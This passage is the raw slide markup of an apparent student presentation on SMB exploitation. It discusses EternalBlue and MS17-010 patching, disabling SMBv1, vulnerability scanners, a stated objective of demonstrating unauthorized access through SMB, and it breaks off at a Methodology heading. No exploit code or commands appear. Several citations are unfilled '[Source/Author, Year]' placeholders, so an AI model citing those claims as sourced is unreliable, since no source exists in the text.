          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Patching and Updates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    One of the most effective solutions for mitigating SMB vulnerabilities is keeping systems up to date with the latest patches. After the WannaCry attack, Microsoft released a critical security update (MS17-010) to address the vulnerabilities exploited by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122025" y="1214681"/>
            <a:ext cx="2971800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="round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28600" y="1269365"/>
            <a:ext cx="3080385" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="ADLaM Display" panose="02010000000000000000" pitchFamily="2" charset="77"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SMB EXPLIOTATION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381772" y="4125887"/>
            <a:ext cx="8380454" cy="1322070"/>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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> Regularly applying security patches and updates from software vendors </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>isessential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> to protect against known exploits. [Source/Author, Year] emphasizes the importance of timely updates to mitigate risks associated with SMB vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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752599"/>
            <a:ext cx="9144000" cy="5105401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F7812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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="467403"/>
            <a:ext cx="3810000" cy="577440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1">
                <a:latin typeface="Avenir Next" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Existing Solutions </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Avenir Next" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3213787" y="1219919"/>
            <a:ext cx="3064991" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F7812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81773" y="2044031"/>
            <a:ext cx="8380454" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Disabling SMBv1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>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533400" y="2667067"/>
            <a:ext cx="8380454" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Microsoft has recommended disabling SMBv1 due to its numerous vulnerabilities. SMBv1 is an outdated protocol, and newer versions (SMBv2 and SMBv3) provide enhanced security features. Disabling SMBv1 can be done through Group Policy or PowerShell commands on Windows systems. [Source/Author, Year] provides detailed instructions and guidelines for disabling SMBv1, reducing the attack surface for potential exploits.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
        <mc:Choice Requires="p14">
          <p:contentPart p14:bwMode="auto" r:id="rId4">
            <p14:nvContentPartPr>
              <p14:cNvPr id="14" name="Ink 13"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="6473792" y="4470840"/>
              <a:ext cx="720720" cy="148320"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="14" name="Ink 13"/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="6473792" y="4470840"/>
                <a:ext cx="720720" cy="148320"/>
              </a:xfrm>
              <a:prstGeom prst="rect"/>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3198495" y="1326515"/>
            <a:ext cx="3080385" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="ADLaM Display" panose="02010000000000000000" pitchFamily="2" charset="77"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SMB EXPLIOTATION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752599"/>
            <a:ext cx="9144000" cy="5105401"/>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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="467403"/>
            <a:ext cx="3810000" cy="577440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="3200" b="1">
                <a:latin typeface="Avenir Next" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Existing Solutions </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Avenir Next" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rounded Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238617" y="1224260"/>
            <a:ext cx="2772547" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="round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81635" y="2044065"/>
            <a:ext cx="8481695" cy="1672590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability Scanners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tools like Nmap, Nessus, and OpenVAS are widely used for scanning networks to identify vulnerable SMB services. These tools provide detailed reports on detected vulnerabilities, enabling administrators to take corrective actions. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="3810000"/>
            <a:ext cx="8361680" cy="1014730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[Source/Author, Year] describes how these scanners can be used to proactively identify and remediate SMB vulnerabilities before they can be exploited by attackers.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121920" y="1279525"/>
            <a:ext cx="3080385" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="ADLaM Display" panose="02010000000000000000" pitchFamily="2" charset="77"/>
                <a:ea typeface="ADLaM Display" panose="02010000000000000000" pitchFamily="2" charset="77"/>
                <a:cs typeface="ADLaM Display" panose="02010000000000000000" pitchFamily="2" charset="77"/>
              </a:rPr>
              <a:t>SMB EXPLIOTATION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239510" y="1279525"/>
            <a:ext cx="3007995" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="ADLaM Display" panose="02010000000000000000" pitchFamily="2" charset="77"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SMB EXPLIOTATION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495300" y="3539320"/>
            <a:ext cx="8076600" cy="75600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2819400"/>
            <a:ext cx="6171360" cy="760320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Research Objective</a:t>
            </a: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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2533650" y="519825"/>
            <a:ext cx="4076700" cy="58356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Research Objective</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1447800"/>
            <a:ext cx="8001000" cy="3169285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Primary Objective:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The primary objective of this project is to demonstrate the process of exploiting vulnerabilities in the Server Message Block (SMB) protocol to gain unauthorized access to a system. This involves a detailed analysis of the exploitation techniques, the impact of successful attacks, and the implications for system security.</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Secondary Objectives:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>To support the primary objective, the following secondary objectives are outlined:</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700" y="3583460"/>
            <a:ext cx="8076600" cy="75600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="2900799"/>
            <a:ext cx="5334000" cy="760320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Problem Definition </a:t>
            </a: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US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="569982"/>
            <a:ext cx="3962400" cy="58356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Problem Definition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1219200"/>
            <a:ext cx="8001000" cy="5015865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" algn="just">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The Server Message Block (SMB) protocol is a cornerstone of network communications, providing shared access to files, printers, and other network resources. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>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he SMB protocol has been plagued by numerous security vulnerabilities over the years, which have been exploited in various high-profile cyberattacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Identification of SMB Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="just">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SMB vulnerabilities, such as those exploited by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> exploit (MS17-010), have proven to be highly detrimental. Techniques for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Exploitation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="just">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The methods and tools used by attackers to exploit SMB vulnerabilities need to be thoroughly understood.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Impact of Exploitation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="just">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Successful SMB exploits can have severe consequences, including unauthorized access to sensitive data, disruption of services, and propagation of malware such as ransomware. Analyzing the impact of these exploits is essential for grasping the full extent of the problem.</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457320" y="3512400"/>
            <a:ext cx="8076600" cy="75600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="3A5F8B"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="!!TextBox"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495720" y="2840121"/>
            <a:ext cx="8152560" cy="760320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="45000" rIns="90000" bIns="45000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ethodology</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18"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189" y="1143139"/>
            <a:ext cx="8153820" cy="5323205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
